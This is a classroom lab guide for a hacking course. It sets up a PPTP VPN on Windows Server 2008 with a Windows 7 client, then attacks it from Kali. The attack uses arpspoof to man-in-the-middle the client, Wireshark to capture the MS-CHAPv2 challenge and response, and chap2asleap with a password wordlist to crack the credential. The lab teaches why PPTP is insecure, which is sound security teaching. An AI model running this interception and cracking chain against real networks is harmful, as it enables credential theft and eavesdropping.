Project 10: Hacking a PPTP VPN with Asleap (25 pts.)

What You Need

Purpose

PPTP is an old VPN protocol, known to be insecure. In its simplest form, PPTP uses MS-CHAPv2 to transmit password information over the network.

Moxie Marlinspike has set up a cloud service that performs a complete brute-force attack to recover any password sent via MS-CHAPv2 for $200. However, we don't have $200 to spend, so we'll settle for a weaker attack using a dictionary of the top 10,000 passwords.

The point is clear--PPTP with MS-CHAPv2 is unsafe to use. Even an attacker with very modest means can steal passwords from it.

This project uses the following tools:

Task 1: Making a Windows Server 2008 PPTP VPN Server

Configuring Network Adapters

Power down the Windows 2008 server from the Start button.

Open Virtual Machine Settings and add a second Ethernet adapter.

In Virtual Machine Settings, configure Network Adapter 1 to use NAT and Network Adapter 2 to use a private Host-Only network, as shown below.

     

Start the Windows 2008 Server virtual machine and log in as Administrator with the password P@ssw0rd.

Troubleshooting

If you are using the Win 2008 I handed out in class, and your virtual machine cannot start, saying that no operating system was found, go into VMware settings and remove the 102 MB hard disk.
Click Start. Search for Network. Open "Network and Sharing Center".

Click "Manage Network Connections".

Right-click "Local Area Connection" and click Properties.

Double-click "Internet Protocol Version 4 (TCP/IP)".

Configure the adapter to "Obtain an IP address automatically" and "Obtain DNS server address automatically", as shown below.

Click OK. Click OK.

Right-click "Local Area Connection 2" and click Properties.

Double-click "Internet Protocol Version 4 (TCP/IP)".

Configure the adapter with these settings, as shown below.

Click OK. Click OK.

Adding the Network Policy and Access Server Role

Click Start, "Administrative Tools", "Server Manager".

In Server Manager, in the right pane, scroll down to the "Roles Summary" section, as shown below, and click "Add Roles".

In the "Add Roles Wizard", click Next.

In the "Select Server Roles" page, check "Network Policy and Access Server", as shown below.

Click Next. Click Next.

In the "Select Role Services" page, check "Network Policy Server" and "Routing and Remote Access Services", as shown below.

Click Next. Click Install.

When you see an "Installation succeeded" message, as shown below, click Close.

Configuring Routing and Remote Access

In Server Manager, in the left pane, expand "Server Manager", expand Roles, and expand "Network Policy and Access Services".

Right-click "Routing and Remote Access" and click "Configure and Enable Routing and Remote Access", as shown below.

In the "Welcome to the Routing and Remote Access Server Setup Wizard" screen, click Next.

In the "Configuration" screen, click "Custom Configuration, as shown below, and click Next.

In the "Custom Configuration" screen, check "VPN access", as shown below, and click Next.

Click Finish.

In the message box that appears click "Start Service".

Configure a Policy to Allow VPN Connections

In Server Manager, in the left pane, right-click on "Remote Access Logging and Policies", as shown below, and click "Launch NPS".

In Network Policy Server, in the left pane, click "Network Policies".

In the right pane, near the top, right-click "Connections to Microsoft Routing and Remote Access server" policy and click Properties.

In the center of the "Connections to Microsoft Routing and Remote Access server Properties" sheet, click "Grant Access" as shown below.

Click OK.

Close the "Network Policy Server" window.

Enable IPv4 Packet Forwarding

In Server Manager, in the left pane, right-click "Routing and Remote Access" and click Properties, as shown below.

On the General tab, check the "IPv4 Router box.

Make sure that "Local area network (LAN) routing only" is selected, as shown below.

Check the "IPv4 Remote access server" box, as shown below.

Click the IPv4 tab.

Check the "Enable IPv4 Forwarding" box, as shown below.

Click OK.

The changes you made require the "Routing and Remote Acccess" server to restart. Click Yes to restart the server.

Activating NAT

In Server Manager, in the left pane, expand IPv4.

In the IPv4 section, right-click General, as shown below, and click "New Routing Protocol".

In the "New Routing Protocol" box, click NAT, as shown below.

Click OK.

In the left pane of Server Manager, in the IPv4 section, right-click NAT, and click "New Interface", as shown below.

In the "New Interface for IPNAT" box, click "Local Area Connection 2", the interface that connects to your private intranet, and then click OK, as shown below.

In "Local Area Connection 2 Properties", click "Private interface connected to private network", as shown below.

Then click OK, and click OK again.

Right-click NAT, and click "New Interface" again.

In the "New Interface for IPNAT" box, click "Local Area Connection", and then click OK,

In "Local Area Connection 2 Properties", click "Public interface connected to the Internet" and "Enable NAT on this interface", as shown below.

Then click OK.

Create the vpnuser Account

In Server Manager, in the left pane, expand Configuration, expand "Local Users and Groups", and click Users.

In the right pane, right-click an empty portion of the screen and click "New User", as shown below.

In the New User box, enter these values, as shown below.

NOTE: Use the exact password "Bond007". If you use some other password, the attack might fail because the password is not in the dictionary.

Click Create. Click Close.

Starting the Routing and Remote Access Server

In Server Manager, in the left pane, right-click "Routing and Remote Access" and click "All Tasks", Start, as shown below.

Configuring the Server to use MS-CHAP2

This is an insecure choice, but it's easier to set up.

In Server Manager, in the left pane, right-click "Routing and Remote Access" and click Properties.

In the "Routing and Remote Access Properties" sheet, click the "Authentication Methods" button.

In the "Authentication Methods" box, clear the "Extensible authentication protocol (EAP)" box, so that only "Microsoft encrypted authentication version 2 (MS-CHAP-v2)" is checked, as shown below.

Click OK. Click OK.

Task 2: Connecting from a Windows 7 Client

Start your Windows 7 virtual machine. Log in as usual.

In Virtual Machine Settings, configure its network adapter to use a private Host-Only network.

Click Start. Search for Network. Open "Network and Sharing Center".

Click "Change adapter settings".

Right-click "Local Area Connection" and click Properties.

Double-click "Internet Protocol Version 4 (TCP/IP)".

Configure the adapter with these settings, as shown below.

Click OK. Click OK.

In the "Network Connections" window, in the top left, click the back arrow to return to "Network and Sharing Center".

In the center of the window, in the lower portion, click "Set up a new connection or network", as shown below.

In the "Choose a connection option" box, click "Connect to a workplace", as shown below. Click Next.

In the "Connect to a workplace" box, click "Use my Internet connection (VPN)", as shown below.

In the next box, click "I'll set up an Internet connection later".

In the "Type the Internet address to connect to" box, enter an Internet address of 10.0.0.1, as shown below. Then click Next.

In the "Type your user name and password" box, enter these values, as shown below.

Then click Create.

A message appears, saying "You are connected", as shown below.

Click Close.

Viewing the Connection on the Server

In the Windows Server 2008 machine, in Server Manager, in the left pane, click "Remote Access Clients".

In the right pane, you should see a connected machine, as shown below.

Saving a Screen Image

Make sure the connected client is visible, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.

Viewing the ARP Cache

On your Windows 7 virtual machine, click Start. Type in CMD.

In the Search results, right-click "Command Prompt" and click "Run as Administrator", as shown below.

If a "User Account Control" box pops up, click Yes.

In the Administrator Command Prompt window, execute this command:

arp -a
You should see an entry showing the Internet Address 10.0.0.1 corresponding to a Physical Address, as shown below.

Your Physical Address will be different from mine--it's your Windows Server 2008 machine.

Clearing the ARP Cache

On your Windows 7 machine, click Start. Search for Network. Open "Network and Sharing Center".

Click "Change adapter settings".

Right-click "VPN Connection" and click Disconnect.

In the Administrator Command Prompt window, execute these command:

arp -d *

arp -a

The entry for 10.0.0.1 is gone, as shown below.

Task 3: Attacking from Kali

Downloading Chap2asleap and a Wordlist

Start Kali 2. Log in as usual. Connect to the Internet.

Execute these commands to download the hacking tool we need, and a list of the 10,000 most common passwords:

wget https://github.com/xiao106347/chap2asleap/raw/master/chap2asleap.py

curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10k_most_common.txt > words.dat

head words.dat

You see the first 10 passwords, as shown below.

Troubleshooting

If those download links don't work, use these:
curl https://samsclass.info/124/proj14/chap2asleap.pyx > chap2asleap.py

wget https://samsclass.info/124/proj14/10k_most_common.txt

Adding Passwords with Initial Caps

These passwords contain only lowercase letters. To make a more realistic wordlist, we need to include passwords with an initial capital letter.

We'll do that with Bash commands, as you've done previously. First we'll work with only the first 10 words to develop the command, and then run it on the complete list.

Execute this command to select words that start with a letter:

head words.dat | grep "^[a-z].*"
The desired passwords appear, as shown below.

Execute this command to convert the first letters of those passwords to uppercase:

head words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/'
The desired passwords appear, as shown below.

Execute these commands to put all the capitalized passwords into a file named Words.dat, and examine the files:

cat words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/' > Words.dat

ls -l

The new file Words.dat is somewhat smaller than words.dat, because it excludes passwords that begin with a numeral, as shown below.

Execute these commands to put all the passwords in a file named allwords.dat, and examine the files:

cat words.dat Words.dat >> allwords.dat

ls -l

The new file allwords.dat has a length equal to the sum of the two files "words.dat" and "Words.dat", as shown below.

Adjusting Kali's Networking

In Virtual Machine Settings, configure the Kali machine to use the private Host-only network, as shown below.

In Kali, in a Terminal window, execute these commands to assign an appropriate IP address to eth0 and test the networking:

ifconfig eth0 10.0.0.3/8

ping 10.0.0.1

You should see replies, as shown below. If you don't, make sure the Windows 2008 Server's firewall is off.

Press Ctrl+C to stop the pings.

Enabling Packet Forwarding on Kali

In Kali, in a Terminal window, execute this command to enable packet forwarding. If you don't do this, the man-in-the-middle attack below will prevent all networking and become a denial-of-service attack instead:
echo 1 > /proc/sys/net/ipv4/ip_forward

Start ARP Poisoning

In Kali, in a Terminal window, execute this command to send bogus ARP replies to the Windows 7 target, redirecting all traffic to the VPN server to the Kali machine:
arpspoof -i eth0 -t 10.0.0.2 -r 10.0.0.1
You see lines of text describing each packet, as shown below.

Leave this window open so the ARP replies continue to go out.

Examining the ARP Cache on the Windows 7 Machine

On your Windows 7 virtual machine, in the Administrator Command Prompt window, execute these commands:
ping 10.0.0.1

ping 10.0.0.3

arp -a

The Physical Address should be the same for both those IP addresses, as shown below.

This is incorrect, of course, and it shows that the ARP poisoning has worked and tricked the Windows 7 machine into sending its traffic to the wrong machine.

Saving a Screen Image

Make sure you can see two identical Physical Addresses for different IP Addresses, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.

Capturing a Challenge and Response with Wireshark

On Kali, open a new Terminal window and execute this command:
wireshark
A "Lua error" box appears. Click OK.

A box warns us that running as root is dangerous. We laugh at danger. Click OK.

In Wireshark, click eth0 and click Start.

In the Filter box, type:

chap
and press Enter.

The packet list should be empty, as shown below.

Preparing the Command

Now you need to build a long command. Open a text editor such as Notepad on your host system and paste in the following command:
python chap2asleap.py -u vpnuser -c CHALLENGE -r RESPONSE -x -p /usr/bin -d ./allwords.dat
This command will use our "allwords.dat" dictionary file and try all those passwords to match the CHALLENGE and RESPONSE strings we get from Wireshark.

At this point, your text editor should look like this:

Connecting to the VPN

On your Windows 7 machine, click Start. Search for Network. Open "Network and Sharing Center".

Click "Change adapter settings".

Right-click "VPN Connection" and click Connect.

A box pops up. Click Connect.

Getting the Challenge and Response from Wireshark

On Kali, the Wireshark window now shows some CHAP packets, as shown below.

Click the red square icon to stop the packet capture.

In the top pane of Wireshark, click a Challenge packet.

In the middle pane, expand PPP. Expand Data. Click on Value to highlight it, as shown below.

Right-click on Value and click Copy, Bytes, "Hex Stream", as shown below.

On your host system, in the text editor, paste that hex stream in the place of CHALLENGE.

Your text editor should now resemble this image:

In the top pane of Wireshark, click a Response packet.

In the middle pane, click on Value. Right-click on Value and click Copy, Bytes, "Hex Stream", as shown below.

On your host system, in the text editor, paste that hex stream in the place of RESPONSE.

Your text editor should now resemble this image:

Running the Attack

Copy the whole command from your text editor and paste it into a Terminal window in Kali.

The attack should succeed immediately, finding the password, as shown below.

Notice how fast it was--this took only 0.06 seconds. We could easily use a much larger dictionary to make the attack even more powerful.

Saving a Screen Image

Make sure the password of Bond007 message is visible, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10c", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to cnit.124@gmail.com with the subject line: Proj 10 from YOUR NAME

Sources

Hacking PPTP VPNs with ASLEAP (from 2009)

Hacking PPTP VPN With Backtrack (from 2012)

How to setup a VPN Server in Windows Server 2008

VPN error 812: The connection was prevented because of a policy configured on your RAS/VPN server

Internet Access through VPN server - need help please

How to enable IP Forwarding


Last revised 10-19-17 7:49 pm